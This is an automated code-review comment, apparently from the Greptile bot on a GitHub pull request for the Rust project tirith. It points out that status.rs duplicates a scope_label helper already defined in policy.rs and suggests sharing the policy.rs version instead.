   <a href="#"><img alt="P2" src="https://greptile-static-assets.s3.amazonaws.com/badges/p2.svg?v=9" align="top"></a> **`scope_label` is duplicated with `policy.rs`**

   `status.rs` defines its own private `scope_label` that is byte-for-byte identical to the one just added in `policy.rs`. Since both files now contain the same exhaustive `match`, any future addition of a `PolicyScope` variant will require updating two places. The `policy.rs` version could be made `pub(crate)` and imported here instead.

   Note: If this suggestion doesn't match your team's coding style, reply to this and let me know. I'll remember it for next time!

   <a href="https://app.greptile.com/ide/claude-code?prompt=This%20is%20a%20comment%20left%20during%20a%20code%20review.%0APath%3A%20crates%2Ftirith%2Fsrc%2Fcli%2Fstatus.rs%0ALine%3A%20604-613%0A%0AComment%3A%0A**%60scope_label%60%20is%20duplicated%20with%20%60policy.rs%60**%0A%0A%60status.rs%60%20defines%20its%20own%20private%20%60scope_label%60%20that%20is%20byte-for-byte%20identical%20to%20the%20one%20just%20added%20in%20%60policy.rs%60.%20Since%20both%20files%20now%20contain%20the%20same%20exhaustive%20%60match%60%2C%20any%20future%20addition%20of%20a%20%60PolicyScope%60%20variant%20will%20require%20updating%20two%20places.%20The%20%60policy.rs%60%20version%20could%20be%20made%20%60pub%28crate%29%60%20and%20imported%20here%20instead.%0A%0AHow%20can%20I%20resolve%20this%3F%20If%20you%20propose%20a%20fix%2C%20please%20make%20it%20concise.&repo=sheeki03%2Ftirith&pr=139&platform=github"><picture><source media="(prefers-color-scheme: dark)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaudeDark.svg?v=3"><source media="(prefers-color-scheme: light)" srcset="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=3"><img alt="Fix in Claude Code" src="https://greptile-static-assets.s3.amazonaws.com/badges/FixInClaude.svg?v=3" height="20"></picture></a>
</details>

<!-- /greptile_failed_comments -->

<sub>Reviews (4): Last reviewed commit: ["fix(pr139): block &quot;To allow&quot; hint falls ..."](https://github.com/sheeki03/tirith/commit/b35ad276b7ce1ccd383111fca665a248e2be1139) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=36813519)</sub>

<!-- /greptile_comment -->